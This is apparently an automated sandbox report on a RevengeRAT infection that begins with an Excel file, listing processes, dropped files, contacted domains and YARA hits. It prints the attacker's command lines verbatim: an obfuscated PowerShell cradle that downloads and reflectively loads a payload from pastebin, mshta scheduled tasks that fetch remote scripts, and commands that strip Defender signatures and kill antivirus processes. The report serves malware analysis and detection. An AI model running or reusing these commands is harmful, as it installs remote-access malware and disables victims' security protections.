Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Searches for user specific document files

Show sources

Source: C:\Windows\System32\forfiles.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\forfiles.exe	Directory queried: C:\Users\user\Documents

Remote Access Functionality:

Detected Revenge RAT

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & exit	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/UwmtjtG9',0,true)(window.close)	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/w3Y29LYH',0,true)(window.close)	Jump to behavior

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
21:17:30	API Interceptor	1377x Sleep call for process: EXCEL.EXE modified
21:17:43	API Interceptor	111x Sleep call for process: mshta.exe modified
21:17:48	API Interceptor	2x Sleep call for process: schtasks.exe modified
22:57:00	API Interceptor	3x Sleep call for process: taskeng.exe modified
22:57:01	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
22:57:01	API Interceptor	49x Sleep call for process: taskkill.exe modified
22:57:01	API Interceptor	9x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.1807343124.04440000.00000004.sdmp	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth

Unpacked PEs

Source	Rule	Description	Author
12.2.powershell.exe.4440000.6.raw.unpack	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth
12.2.powershell.exe.4440000.6.unpack	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

EXCEL.EXE (PID: 2144 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 716335EDBB91DA84FC102425BFDA957E)

mshta.exe (PID: 1228 cmdline: mshta.exe http://www.bitly.com/SexoPhone2 MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

schtasks.exe (PID: 2472 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 100 /tn 'MicrofoftOffice19' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/UwmtjtG9\',0,true)(window.close)' /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

cmd.exe (PID: 704 cmdline: 'C:\Windows\System32\cmd.exe' /c powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N) MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 620 cmdline: powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

cmd.exe (PID: 884 cmdline: 'C:\Windows\System32\cmd.exe' /C forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & exit MD5: AD7B9C14083B52BC532FBA5948342B98)

forfiles.exe (PID: 2880 cmdline: forfiles /c 'taskkill /f /im AvastUi.exe' MD5: 831F24F91D96C301529BE0C96FB352B9)

taskkill.exe (PID: 2368 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2124 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1236 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2200 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3020 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1860 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3460 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3236 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3240 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1288 cmdline: /f /im AvastUi.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

cmd.exe (PID: 912 cmdline: 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit MD5: AD7B9C14083B52BC532FBA5948342B98)

MpCmdRun.exe (PID: 2760 cmdline: MpCmdRun.exe -removedefinitions -dynamicsignatures MD5: 050B12A317DD0D9A2A595ED8F06F0EE5)

taskkill.exe (PID: 1300 cmdline: taskkill /f /im winword.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1144 cmdline: taskkill /f /im excel.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1048 cmdline: taskkill /f /im MSPUB.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 2040 cmdline: taskkill /f /im POWERPNT.EXE MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

forfiles.exe (PID: 2964 cmdline: forfiles /c 'taskkill /f /im MSASCuiL.exe' MD5: 831F24F91D96C301529BE0C96FB352B9)

taskkill.exe (PID: 3304 cmdline: /f /im MSASCuiL.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3720 cmdline: /f /im MSASCuiL.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 1568 cmdline: /f /im MSASCuiL.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 920 cmdline: /f /im MSASCuiL.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

taskkill.exe (PID: 3444 cmdline: /f /im MSASCuiL.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

schtasks.exe (PID: 3888 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'Ms-New' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/w3Y29LYH\',0,true)(window.close)' /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

taskeng.exe (PID: 2528 cmdline: taskeng.exe {DEF81FE9-E535-4A37-A1ED-09F34CC17167} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[2] MD5: 4F2659160AFCCA990305816946F69407)

mshta.exe (PID: 3880 cmdline: C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/UwmtjtG9',0,true)(window.close) MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

mshta.exe (PID: 2832 cmdline: C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/w3Y29LYH',0,true)(window.close) MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Size (bytes):	854
Entropy (8bit):	3.020984655549695
Encrypted:	false
MD5:	2DA0C663A67108A3F7980DCA9E0DF538
SHA1:	6363314CF00AF89FAEAA60A7BC706EE7778428AC
SHA-256:	35D0CD8108C230865C57DBE152AF7FDA983859D7824BB5B407C2F53446725C51
SHA-512:	D8DC79F7E565CCD82C660505E8444E3DFDE1BEAB7F9E53A55322D538C5AF117AD4C9993EE0EF43271B27E9D27008BB558E40D01C1C1EFA7E522D390D0DB9059E
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\95UA963V\SexoPhone2[1].htm Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document text
Size (bytes):	137
Entropy (8bit):	4.542286959294343
Encrypted:	false
MD5:	AEFC62041E41D8D55AD0A042F934FFCC
SHA1:	8C9028F0E3D5AF89C9AFF17751FA0281BA77EF27
SHA-256:	4439D073F0C31F812796739140875195B6E3055802A1C03D2FDE1DCBCFEA34EF
SHA-512:	BB23C7A63C3BADD29E71F1C648E87BF1287F4F08F2070F408457C0384BEC64CBDEF80C4AC7D26EA2EBBAAD6DFFB94AF0E8BFF60604F4DCFA0E87B2CB0D58F439
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\95UA963V\error[1] Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	UTF-8 Unicode (with BOM) HTML document text, with CRLF line terminators
Size (bytes):	3247
Entropy (8bit):	5.459946526910292
Encrypted:	false
MD5:	16AA7C3BEBF9C1B84C9EE07666E3207F
SHA1:	BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
SHA-256:	7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
SHA-512:	245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\95UA963V\icon18_wrench_allbkg[1].png Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	PNG image, 18 x 18, 8-bit colormap, non-interlaced
Size (bytes):	475
Entropy (8bit):	7.239750626651385
Encrypted:	false
MD5:	F617EFFE6D96C15ACFEA8B2E8AAE551F
SHA1:	6D676AF11AD2E84B620CCE4D5992B657CB2D8AB6
SHA-256:	D172D750493BE64A7ED84DEC1DD2A0D787BA42F78BC694B0858F152C52B6620B
SHA-512:	3189A6281AD065848AFC700A47BEA885CD3905DAE11CCB28B88C81D3B28F73F4DFA2D5D1883BB9325DC7729A32AA29B7D1181AE5752DF00F6931624B50571986
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G0S767W3\2985278703-css_bundle_v2[1].css Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	ASCII text, with very long lines
Size (bytes):	36985
Entropy (8bit):	5.157030838782868
Encrypted:	false
MD5:	80EBEB489F70E22763F6FD67667ECB02
SHA1:	68F1F5D63F748EB3AD8A56DBC2BDD6877A0D7113
SHA-256:	814ED3598B0B3CC66C62EE854D3A6651D1202299A4A18B09B3A58356F832A0FA
SHA-512:	6A1B007308A485B5B368AF2C1D2F409B6AB697FDD72A91AA68D8E80356534B120C145CAF91D47A06B9B8F4222B197002F313CEF4B160CDA9E16D39EDA8AB31C8
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G0S767W3\body_gradient_tile_light[1].png Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	PNG image, 10 x 10, 1-bit colormap, non-interlaced
Size (bytes):	95
Entropy (8bit):	4.633118599879715
Encrypted:	false
MD5:	3B2A20D5B0BA4CA0C5DD90865AD6B9C4
SHA1:	A90928A16D11D21E112B45B60990A9D7D19CC1D5
SHA-256:	0FDCB4746995F0D5240E5EC11370CB950722A894F3CFF4118AA68CCC92010EDD
SHA-512:	EF256091EE551337B9789E8D55C558D85AF0780C2906FA971A33D36A6F9D78114A573D606DAB086816006E072CEF7029EFE4D47F7BF3BE16007CA464F3281765
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G0S767W3\error[1] Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	UTF-8 Unicode (with BOM) HTML document text, with CRLF line terminators
Size (bytes):	3247
Entropy (8bit):	5.459946526910292
Encrypted:	false
MD5:	16AA7C3BEBF9C1B84C9EE07666E3207F
SHA1:	BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
SHA-256:	7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
SHA-512:	245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\864213505-ieretrofit[1].js Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	ASCII English text, with very long lines
Size (bytes):	36707
Entropy (8bit):	5.528937471733972
Encrypted:	false
MD5:	364501E083769DD2522BD01655BF399D
SHA1:	2D4BA7B0E65A955DD6D679ED83517801418A10A8
SHA-256:	0C20A9CE611E3EE5B32F6FF83F04D64EC7CFE867139AD51AA4E4AF210E1C9832
SHA-512:	DC0B992908DEFF9F736DED2FB50E8CE0EF183EDE4CEC1D746EF5CA97A1C385C34A5D446B567663B64464C42D7AA1135F9E42E53720A6F83F8055935D64EB91A9
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\SexoPhone2[1].htm Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document text
Size (bytes):	178
Entropy (8bit):	4.560890767001816
Encrypted:	false
MD5:	CD2E0E43980A00FB6A2742D3AFD803B8
SHA1:	81FFBD1712AFE8CDF138B570C0FC9934742C33C1
SHA-256:	BD9DF047D51943ACC4BC6CF55D88EDB5B6785A53337EE2A0F74DD521AEDDE87D
SHA-512:	0344C6B2757D4D787ED4A31EC7043C9DC9BF57017E451F60CECB9AD8F5FEBF64ACF2A6C996346AE4B23297623EBF747954410AEE27EE3C2F3C6CCD15A15D0F2D
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\error[1] Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	UTF-8 Unicode (with BOM) HTML document text, with CRLF line terminators
Size (bytes):	3247
Entropy (8bit):	5.459946526910292
Encrypted:	false
MD5:	16AA7C3BEBF9C1B84C9EE07666E3207F
SHA1:	BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
SHA-256:	7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
SHA-512:	245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\gradients_light[1].png Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	PNG image, 20 x 1100, 8-bit/color RGBA, non-interlaced
Size (bytes):	403
Entropy (8bit):	5.849127564472003
Encrypted:	false
MD5:	4F7DE2E6AFEFB125B1F14FA5CDA610EE
SHA1:	57A145F234B504A73F9D55CF39F2231A04719456
SHA-256:	ECB30886406E3F776FF7BC3834DE849944471E626FF148BED2FA389D02866044
SHA-512:	9E3C207F0931EE4C5F48E62670F33D33815CF0779AC5F719017401C20273B4E0403CE03C08643A58BA4C3B023F9C691C34E8FDA776B710DFE8EE3DBFEE7D887B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\3722393240-widgets[1].js Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	ASCII English text, with very long lines
Size (bytes):	150687
Entropy (8bit):	5.56795633546219
Encrypted:	false
MD5:	6F7DFAE2A303BB0383107FB63131EDE3
SHA1:	EB4620E449064C9AEEF654D405EC7F15D4FC1B85
SHA-256:	5C6FBFD67DE656F5CE214B6E768FD5DD523748C0E006A483033217905CDB02DC
SHA-512:	A1F4EAC4BDC10FA6D289348F298D739970A16F3643389E02B1A2331D14B994A209490DD027D8A120BFCC0F5D31A921363AC4B2003C8D0DC7442EB66EFA1F6DBD
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\blog-page[1].htm Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document text
Size (bytes):	61806
Entropy (8bit):	4.9320990469950665
Encrypted:	false
MD5:	977B1DC130FF1D68AE39F4D0047E82D6
SHA1:	ABFD37D1CF27D102A0352C4750CDA8EA215C3343
SHA-256:	A8EB839EF429586C19BB9E6E030DB15F16E57A899AC2EEAA8A7BE5BF5C3E7D35
SHA-512:	4071730DD6DDEEC6998B9E2BF8FC6F424C51F13E48924DF91FCD160953D9D1DD5C1D5D63F54869E504227713AD080E7496FC0F5FB24521EC5C20945D360D1379
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\error[1] Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	UTF-8 Unicode (with BOM) HTML document text, with CRLF line terminators
Size (bytes):	3247
Entropy (8bit):	5.459946526910292
Encrypted:	false
MD5:	16AA7C3BEBF9C1B84C9EE07666E3207F
SHA1:	BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
SHA-256:	7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
SHA-512:	245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\432XC5PE.txt Download File
Process:	C:\Windows\System32\mshta.exe
File Type:	ASCII text
Size (bytes):	93
Entropy (8bit):	4.612828742526181
Encrypted:	false
MD5:	A888C4424EBE5F01F6BEDA988CB03B32
SHA1:	3E34857E3607B9E859AA5E22C1D67355422AF9C9
SHA-256:	9194100B4285C9788D61700A8EB03E5E0BBA081A075DD7F33DC2C4C99C359AE9
SHA-512:	7452DD581CA7E40CED046D1EE46698C3AB29452FFAFCB2FE55AE4864AFE20B832388AD41A023F8E871547C16C4760979F3CCAB55D8D89612A600F74F6AE5C1E8
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z9JR0WB7UYJ87CQC6CEU.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5513085593617206
Encrypted:	false
MD5:	ECF6C9B8F3EA8FB666154EAC226E84EC
SHA1:	15A5489D002426E7DA7E8A1490B227DE97A89F99
SHA-256:	681EE02A9E36601F978D8D0B2E07B35EEB46570654F8ECB14FD20B10519CBC55
SHA-512:	475388F8EAB3EB38AE75EA84035FA1D48641840CF95FCC2F7F118797C52BDBA140865223B18E47AA480E424570F0A37270D3EFB299F99B137D0D801721C89020
Malicious:	false
Reputation:	low

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bitly.com	67.199.248.14	true	false	high
blogspot.l.googleusercontent.com	172.217.168.33	true	false	high
pussi244.ddns.net	216.170.123.122	true	false	high
pastebin.com	104.20.208.21	true	false	high
treffictesgn.blogspot.com	unknown	unknown	false	high
www.bitly.com	unknown	unknown	false	high
www.blogger.com	unknown	unknown	false	high
resources.blogblog.com	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://search.chol.com/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://www.mercadolivre.com.br/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
http://www.merlin.com.pl/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
https://www.blogger.com	blog-page[1].htm.2.dr	false	high
https://resources.blogblog.com/I	mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp	false	high
http://www.dailymail.co.uk/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.js	blog-page[1].htm.2.dr	false	high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	false	unknown
https://treffictesgn.blogspot.com/	blog-page[1].htm.2.dr	false	high
http://www.fontbureau.com/designers	mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	false	high
https://treffictesgn.blogspot.com/p/blog-page.html0-widgets.js	mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	false	high
https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)	mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp, blog-page[1].htm.2.dr	false	high
https://treffictesgn.blogspot.com/p/blog-page.htmlP	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	high
http://fr.search.yahoo.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
http://in.search.yahoo.com/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
https://resources.blogblog.com/m	mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp	false	high
http://img.shopzilla.com/shopzilla/shopzilla.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
https://treffictesgn.blogspot.com/p/blog-page.htmll	mshta.exe, 00000002.00000002.1663789366.02281000.00000004.sdmp	false	high
https://resources.blogblog.com/img/widgets/s_top.png	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp, mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000002.1663671579.0223F000.00000004.sdmp, mshta.exe, 00000002.00000003.1637870561.00124000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1657227412.02810000.00000004.sdmp	false	high
https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.jss	mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp, mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	false	high
https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1735791605848944865&zx=34c390eb-f2fb-	mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1627969280.02223000.00000004.sdmp	false	high
https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.jsl	mshta.exe, 00000002.00000003.1627822306.02192000.00000004.sdmp	false	high
http://msk.afisha.ru/	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	high
https://resources.blogblog.com/img/triangle_open.gif)P	mshta.exe, 00000002.00000002.1663426110.02007000.00000004.sdmp	false	high
http://busca.igbusca.com.br//app/static/images/favicon.ico	mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	false	unknown
https://treffictesgn.blogspot.com/p/blog-page.htmls	mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	false	high
http://ocsp.pki.goog/GTSGIAG30	mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	false	unknown
